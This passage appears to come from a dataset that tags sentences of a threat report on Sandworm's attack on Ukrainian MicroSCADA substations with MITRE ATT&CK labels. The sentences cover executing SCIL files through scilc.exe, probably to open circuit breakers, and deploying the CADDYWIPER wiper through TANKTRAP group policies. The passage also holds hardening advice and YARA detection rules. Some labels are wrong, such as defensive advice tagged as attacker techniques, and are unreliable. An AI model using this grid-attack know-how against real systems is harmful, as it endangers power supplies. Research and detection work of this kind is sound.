"97_mitre_report", "page_number": 1, "sentence_id": 60, "context_before": "Reconstruction of the host’s anti-virus logs indicates “lun.vbs” and “n.bat” were executed in close time proximity.", "sentence_text": "Because of this and the reference to the attacker’s ISO folder path, we believe that the command fragment in Figure 7 is likely the contents of “n.bat”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s61-fbff00", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 61, "context_before": "Because of this and the reference to the attacker’s ISO folder path, we believe that the command fragment in Figure 7 is likely the contents of “n.bat”.", "sentence_text": "The syntax of the command fragment includes “scilc.exe”, a native utility that is part of the MicroSCADA software suite.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Leverages native MicroSCADA utility scilc.exe", "entities": [ { "text": "scilc.exe", "start": 45, "end": 54, "label": "Infrastructure_Indicator" }, { "text": " MicroSCADA software suite.", "start": 93, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s62-2be3dc", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 62, "context_before": "The syntax of the command fragment includes “scilc.exe”, a native utility that is part of the MicroSCADA software suite.", "sentence_text": "The impacted MicroSCADA system was running an EOL software version that allowed default access to the SCIL-API.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploits EOL MicroSCADA with default SCIL-API access", "entities": [ { "text": "MicroSCADA system", "start": 13, "end": 30, "label": "Infrastructure_Indicator" }, { "text": "EOL software version", "start": 46, "end": 66, "label": "Infrastructure_Indicator" }, { "text": "SCIL-API.", "start": 102, "end": 111, "label": "Infrastructure_Indicator" }, { "text": "allowed default access", "start": 72, "end": 94, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s63-3f71a7", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 63, "context_before": "The impacted MicroSCADA system was running an EOL software version that allowed default access to the SCIL-API.", "sentence_text": "The “-do” flag specifies a SCIL program file to execute (Figure 8).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Uses scilc.exe -do flag to execute SCIL program files", "entities": [ { "text": "“-do” flag specifies a SCIL program file to execute", "start": 4, "end": 55, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s64-5244d9", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 64, "context_before": "The “-do” flag specifies a SCIL program file to execute (Figure 8).", "sentence_text": "Lastly, the command supplies a file named “s1.txt” in the \"pack\\scil\\\" folder of the attacker's ISO.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Executes SCIL commands from s1.txt file in ISO", "entities": [ { "text": "s1.txt", "start": 43, "end": 49, "label": "Infrastructure_Indicator" }, { "text": "pack\\scil\\", "start": 59, "end": 69, "label": "Infrastructure_Indicator" }, { "text": "attacker's ISO", "start": 85, "end": 99, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s65-8c37bd", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 65, "context_before": "Lastly, the command supplies a file named “s1.txt” in the \"pack\\scil\\\" folder of the attacker's ISO.", "sentence_text": "We assess \"pack\\scil\\s1.txt\" is likely a file containing SCIL commands the attackers executed in MicroSCADA.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.003", "name": "Windows Command Shell" } ], "procedure": "Executes SCIL commands from s1.txt file against MicroSCADA", "entities": [ { "text": "pack\\scil\\s1.txt\"", "start": 11, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "file containing SCIL commands ", "start": 41, "end": 71, "label": "Action" }, { "text": "executed in MicroSCADA", "start": 85, "end": 107, "label": "Action" }, { "text": "MicroSCADA", "start": 97, "end": 107, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s66-f7e1d2", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 66, "context_before": "We assess \"pack\\scil\\s1.txt\" is likely a file containing SCIL commands the attackers executed in MicroSCADA.", "sentence_text": "This file was unrecoverable at the time of analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s67-8e6b16", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 67, "context_before": "This file was unrecoverable at the time of analysis.", "sentence_text": "According to Hitachi Energy’s documentation , SCIL is a high level programming language designed for MicroSCADA control systems and can operate the system and its features (Figure 9).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s68-823ba6", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 68, "context_before": "According to Hitachi Energy’s documentation , SCIL is a high level programming language designed for MicroSCADA control systems and can operate the system and its features (Figure 9).", "sentence_text": "While we were unable to identify the SCIL commands executed, we believe they were probably commands to open circuit breakers in the victim’s substation environments.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Executes SCIL commands to open substation circuit breakers", "entities": [ { "text": "SCIL commands executed", "start": 37, "end": 59, "label": "Action" }, { "text": "commands to open circuit breakers", "start": 91, "end": 124, "label": "Action" }, { "text": "substation environments.", "start": 141, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s69-b400c6", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 69, "context_before": "While we were unable to identify the SCIL commands executed, we believe they were probably commands to open circuit breakers in the victim’s substation environments.", "sentence_text": "The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870-5-104 protocol for TCP/IP connections or the IEC-60870-5-101 protocol for serial connections.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Relays malicious commands via industrial protocols to RTUs", "entities": [ { "text": "MicroSCADA server", "start": 40, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "substation RTUs", "start": 87, "end": 102, "label": "Infrastructure_Indicator" }, { "text": "IEC-60870-5-104 protocol ", "start": 118, "end": 143, "label": "Infrastructure_Indicator" }, { "text": "IEC-60870-5-101 protocol ", "start": 173, "end": 198, "label": "Infrastructure_Indicator" }, { "text": "relay the commands", "start": 61, "end": 79, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s70-d8698f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 70, "context_before": "The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870-5-104 protocol for TCP/IP connections or the IEC-60870-5-101 protocol for serial connections.", "sentence_text": "Sandworm Deployed New CADDYWIPER Variant to Further Disrupt the Victim’s IT Environment", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys new CADDYWIPER variant in IT environment", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 22, "end": 32, "label": "MalwareTool" }, { "text": "Deployed New CADDYWIPER Variant", "start": 9, "end": 40, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s71-8fe85b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 71, "context_before": "Sandworm Deployed New CADDYWIPER Variant to Further Disrupt the Victim’s IT Environment", "sentence_text": "Two days following the OT activity, Sandworm deployed a new variant of CADDYWIPER throughout the IT environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys new CADDYWIPER variant across IT environment", "entities": [ { "text": "Sandworm", "start": 36, "end": 44, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 71, "end": 81, "label": "MalwareTool" }, { "text": "deployed a new variant", "start": 45, "end": 67, "label": "Action" }, { "text": " IT environment.", "start": 96, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s72-cd1a7b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 72, "context_before": "Two days following the OT activity, Sandworm deployed a new variant of CADDYWIPER throughout the IT environment.", "sentence_text": "We have observed CADDYWIPER deployed across several verticals in Ukraine, including the government and financial sectors, throughout Russia’s invasion of Ukraine.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys CADDYWIPER across multiple Ukrainian sectors", "entities": [ { "text": "CADDYWIPER", "start": 17, "end": 27, "label": "MalwareTool" }, { "text": "Ukraine, including the government and financial sectors", "start": 65, "end": 120, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s73-0a21bc", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 73, "context_before": "We have observed CADDYWIPER deployed across several verticals in Ukraine, including the government and financial sectors, throughout Russia’s invasion of Ukraine.", "sentence_text": "CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deploys C-based wiper malware for data destruction", "entities": [ { "text": "CADDYWIPER", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "making data irrecoverable ", "start": 65, "end": 91, "label": "Action" }, { "text": "causing maximum damage", "start": 95, "end": 117, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s74-0f3400", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 74, "context_before": "CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment.", "sentence_text": "CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Wipes local files then proceeds to mapped drive", "entities": [ { "text": "wipe all files", "start": 27, "end": 41, "label": "Action" }, { "text": "wipe any mapped drives.", "start": 63, "end": 86, "label": "Action" }, { "text": "CADDYWIPER", "start": 0, "end": 10, "label": "MalwareTool" } ] }, { "uid": "mitre-97_mitre_report-p1-s75-0df5c8", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 75, "context_before": "CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives.", "sentence_text": "It will then attempt to wipe the physical drive partition itself.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Wipes physical drive partitions after file destruction", "entities": [ { "text": "It", "start": 0, "end": 2, "label": "MalwareTool" }, { "text": "wipe the physical drive partition", "start": 24, "end": 57, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s76-a47b7d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 76, "context_before": "It will then attempt to wipe the physical drive partition itself.", "sentence_text": "We have observed Sandworm utilize CADDYWIPER in disruptive operations across multiple intrusions.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Utilizes CADDYWIPER in multiple disruptive operations", "entities": [ { "text": "Sandworm", "start": 17, "end": 25, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 34, "end": 44, "label": "MalwareTool" }, { "text": "utilize CADDYWIPER in disruptive operations", "start": 26, "end": 69, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s77-69b914", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 77, "context_before": "We have observed Sandworm utilize CADDYWIPER in disruptive operations across multiple intrusions.", "sentence_text": "Sandworm deployed CADDYWIPER in this operation via two Group Policy Objects (GPO) from a Domain Controller using TANKTRAP.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "Deploys CADDYWIPER via GPO from Domain Controller using TANKTRAP", "entities": [ { "text": "Sandworm", "start": 0, "end": 8, "label": "ThreatActor" }, { "text": "CADDYWIPER", "start": 18, "end": 28, "label": "MalwareTool" }, { "text": "TANKTRAP", "start": 113, "end": 121, "label": "MalwareTool" }, { "text": "deployed CADDYWIPER in this operation via two Group Policy Objects (GPO)", "start": 9, "end": 81, "label": "Action" }, { "text": "Domain Controller", "start": 89, "end": 106, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s78-5c3051", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 78, "context_before": "Sandworm deployed CADDYWIPER in this operation via two Group Policy Objects (GPO) from a Domain Controller using TANKTRAP.", "sentence_text": "TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "Utilizes PowerShell-based TANKTRAP for GPO wiper distribution", "entities": [ { "text": "TANKTRAP", "start": 0, "end": 8, "label": "MalwareTool" }, { "text": "written in PowerShell", "start": 22, "end": 43, "label": "Action" }, { "text": "utilizes Windows group policy to spread and launch a wiper.", "start": 49, "end": 108, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s79-8c8d40", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 79, "context_before": "TANKTRAP is a utility written in PowerShell that utilizes Windows group policy to spread and launch a wiper.", "sentence_text": "These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Uses GPO for file distribution and scheduled task execution", "entities": [ { "text": "copy a file from a server to the local hard drive", "start": 47, "end": 96, "label": "Action" }, { "text": "schedule a task to run the copied file", "start": 104, "end": 142, "label": "Action" }, { "text": "group policies", "start": 6, "end": 20, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s80-891a88", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 80, "context_before": "These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time.", "sentence_text": "Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1021.002", "name": "SMB/Windows Admin Shares" } ], "procedure": "Deploys CADDYWIPER as msserver.exe via TANKTRAP GPOs", "entities": [ { "text": "TANKTRAP", "start": 5, "end": 13, "label": "MalwareTool" }, { "text": "CADDYWIPER ", "start": 28, "end": 39, "label": "MalwareTool" }, { "text": "GPOs", "start": 14, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "staged directory", "start": 46, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "msserver.exe.", "start": 77, "end": 90, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-97_mitre_report-p1-s81-1cae40", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "Both TANKTRAP GPOs deployed CADDYWIPER from a staged directory to systems as msserver.exe.", "sentence_text": "CADDYWIPER was then executed as a scheduled task at a predetermined time.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task" } ], "procedure": "Executes CADDYWIPER via scheduled task at predetermined time", "entities": [ { "text": "CADDYWIPER", "start": 0, "end": 10, "label": "MalwareTool" }, { "text": "executed as a scheduled task", "start": 20, "end": 48, "label": "Action" }, { "text": "predetermined time.", "start": 54, "end": 73, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s82-cfe24c", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "CADDYWIPER was then executed as a scheduled task at a predetermined time.", "sentence_text": "Appendix A: Discovery and Hardening Guidance", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s83-f09882", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "Appendix A: Discovery and Hardening Guidance", "sentence_text": "In this incident, the attacker leveraged an EOL version of the MicroSCADA supervisory control system.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploits End-of-Life MicroSCADA supervisory control system", "entities": [ { "text": "attacker", "start": 22, "end": 30, "label": "ThreatActor" }, { "text": " EOL version of the MicroSCADA supervisory control system.", "start": 43, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "leveraged ", "start": 31, "end": 41, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s84-7a3b7e", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "In this incident, the attacker leveraged an EOL version of the MicroSCADA supervisory control system.", "sentence_text": "If required to continue using the interface, asset owners can refer to MRK511518 MicroSCADA X Cyber Security Deployment Guideline on how to harden the MicroSCADA.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s85-c83d97", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "If required to continue using the interface, asset owners can refer to MRK511518 MicroSCADA X Cyber Security Deployment Guideline on how to harden the MicroSCADA.", "sentence_text": "Please contact the Hitachi Energy MicroSCADA support team to obtain the documentation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s86-f7d9a0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "Please contact the Hitachi Energy MicroSCADA support team to obtain the documentation.", "sentence_text": "We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s87-e8108b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "We note that the MicroSCADA control system became a Hitachi Energy product in 2022 after a divestiture from ABB.", "sentence_text": "Asset owners should reference both vendors in asset inventories and manual asset inspections to determine if the product is present in any OT environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s88-dcd95d", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "Asset owners should reference both vendors in asset inventories and manual asset inspections to determine if the product is present in any OT environments.", "sentence_text": "Harden MicroSCADA and other SCADA management hosts:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s89-dee170", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "Harden MicroSCADA and other SCADA management hosts:", "sentence_text": "Update MicroSCADA to supported versions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s90-36fcf0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "Update MicroSCADA to supported versions.", "sentence_text": "Configure MicroSCADA to require authentication and establish a least privilege design for user permissions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s91-05582b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "Configure MicroSCADA to require authentication and establish a least privilege design for user permissions.", "sentence_text": "Establish robust network segmentation between MicroSCADA hosts and IT networks.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Exploits lack of network segmentation between OT and IT networks", "entities": [ { "text": "MicroSCADA", "start": 46, "end": 56, "label": "MalwareTool" }, { "text": "IT networks.", "start": 67, "end": 79, "label": "MalwareTool" }, { "text": "Establish robust network segmentation", "start": 0, "end": 37, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s92-8e3ab3", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "Establish robust network segmentation between MicroSCADA hosts and IT networks.", "sentence_text": "Enable robust application logging for MicroSCADA and aggregate logs to a central location.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s93-41328f", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "Enable robust application logging for MicroSCADA and aggregate logs to a central location.", "sentence_text": "If/where feasible, configure the base system in “read-only” mode and ensure no external SCIL-API programs (such as scilc.exe) are allowed.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Exploits ability to execute external SCIL-API programs like scilc.exe", "entities": [ { "text": "scilc.exe", "start": 115, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "SCIL-API programs", "start": 88, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "configure the base system in “read-only” mode", "start": 19, "end": 64, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s94-714186", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "If/where feasible, configure the base system in “read-only” mode and ensure no external SCIL-API programs (such as scilc.exe) are allowed.", "sentence_text": "Consult with OEMs for installed SCADA software to identify similar methods of code execution within their software and to obtain guidance on mitigations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s95-0d379a", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "Consult with OEMs for installed SCADA software to identify similar methods of code execution within their software and to obtain guidance on mitigations.", "sentence_text": "Monitor MicroSCADA systems and other SCADA management systems for:\nCommand-line execution of MicroSCADA “Scilc.exe” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program/commands.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1218", "name": "System Binary Proxy Execution" } ], "procedure": "Monitors for command-line execution of Scilc.exe and native MicroSCADA binaries", "entities": [ { "text": "Scilc.exe", "start": 105, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "native MicroSCADA binaries", "start": 133, "end": 159, "label": "Infrastructure_Indicator" }, { "text": "Command-line execution", "start": 67, "end": 89, "label": "Action" }, { "text": "execute unauthorized SCIL program/commands.", "start": 185, "end": 228, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s96-eabbe9", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "Monitor MicroSCADA systems and other SCADA management systems for:\nCommand-line execution of MicroSCADA “Scilc.exe” binary and other native MicroSCADA binaries that may be leveraged to execute unauthorized SCIL program/commands.", "sentence_text": "Network traffic and process related telemetry to/from host(s) operating the MicroSCADA software.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Monitors network and process telemetry for MicroSCADA host activity", "entities": [ { "text": "MicroSCADA software.", "start": 76, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "Network traffic and process related telemetry", "start": 0, "end": 45, "label": "Action" }, { "text": "host(s) operating the MicroSCADA software.", "start": 54, "end": 96, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s97-1e5efc", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Network traffic and process related telemetry to/from host(s) operating the MicroSCADA software.", "sentence_text": "Investigate anomalous activity and correlate findings with process telemetry.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1040", "name": "Network Sniffing" } ], "procedure": "Investigates anomalous activity and correlates with process telemetry for detection", "entities": [ { "text": "Investigate anomalous activity", "start": 0, "end": 30, "label": "Action" }, { "text": "correlate findings with process telemetry.", "start": 35, "end": 77, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s98-686092", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "Investigate anomalous activity and correlate findings with process telemetry.", "sentence_text": "Files transferred or moved onto MicroSCADA hosts.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1039", "name": "Data from Network Shared Drive" } ], "procedure": "Monitors file transfers onto MicroSCADA hosts", "entities": [ { "text": "Files transferred or moved onto MicroSCADA hosts.", "start": 0, "end": 49, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s99-8c0987", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "Files transferred or moved onto MicroSCADA hosts.", "sentence_text": "Newly created files with MicroSCADA or SCIL programming language references.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Monitors for newly created files with SCIL programming references", "entities": [ { "text": "MicroSCADA", "start": 25, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "SCIL programming language", "start": 39, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "Newly created files", "start": 0, "end": 19, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s100-a003ba", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Newly created files with MicroSCADA or SCIL programming language references.", "sentence_text": "Unauthorized changes in MicroSCADA system configuration and data.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1565.002", "name": "Transmitted Data Manipulation" } ], "procedure": "Monitors for unauthorized MicroSCADA configuration and data changes", "entities": [ { "text": "MicroSCADA system configuration", "start": 24, "end": 55, "label": "Infrastructure_Indicator" }, { "text": "Unauthorized changes in MicroSCADA system configuration and data.", "start": 0, "end": 65, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s101-bc78d0", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "Unauthorized changes in MicroSCADA system configuration and data.", "sentence_text": "Appendix B: Indicators of Compromise (IOCs)\nAppendix C: YARA Rules rule M_Methodology_MicroSCADA_SCILC_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Provides YARA rules for detecting MicroSCADA SCILC attack strings", "entities": [ { "text": "MicroSCADA Supervisory Control Implementation Language (SCIL)", "start": 233, "end": 294, "label": "Infrastructure_Indicator" }, { "text": "scilc.exe binary", "start": 295, "end": 311, "label": "Infrastructure_Indicator" }, { "text": "Searching for files containing strings ", "start": 174, "end": 213, "label": "Action" } ] }, { "uid": "mitre-97_mitre_report-p1-s102-b1309b", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "Appendix B: Indicators of Compromise (IOCs)\nAppendix C: YARA Rules rule M_Methodology_MicroSCADA_SCILC_Strings { meta:\nauthor = \"Mandiant\" date = \"2023-02-13\" description = \"Searching for files containing strings associated with the MicroSCADA Supervisory Control Implementation Language (SCIL) scilc.exe binary.\"", "sentence_text": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-97_mitre_report-p1-s103-f4ef82", "source": "mitre", "doc_id": "97_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "disclaimer = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "strings:\n$s1 = \"scilc.exe\" ascii wide $s2 = \"Scilc.exe\" ascii wide $s3 = \"SCILC.exe\" ascii wide $s4 = \"SCILC.EXE\" ascii wide condition:\nfilesize < 1MB and any of them } rule M_Hunting_MicroSCADA_SCILC_Program_Execution_Strings { meta:", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Provides detection strings for SCILC.exe execution patterns", "entities": [ { "text": "scilc.exe", "start": 16, "end": 25, "label": "Infrastructure_Indicator" }, { "text": "Scilc.exe", "start": 45, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "SCILC.exe", "start": 74, "end": 83, "label": "Infrastructure_Indicator" }, { "text": "SCILC.EXE", "start": 103, "end": 112, "label": 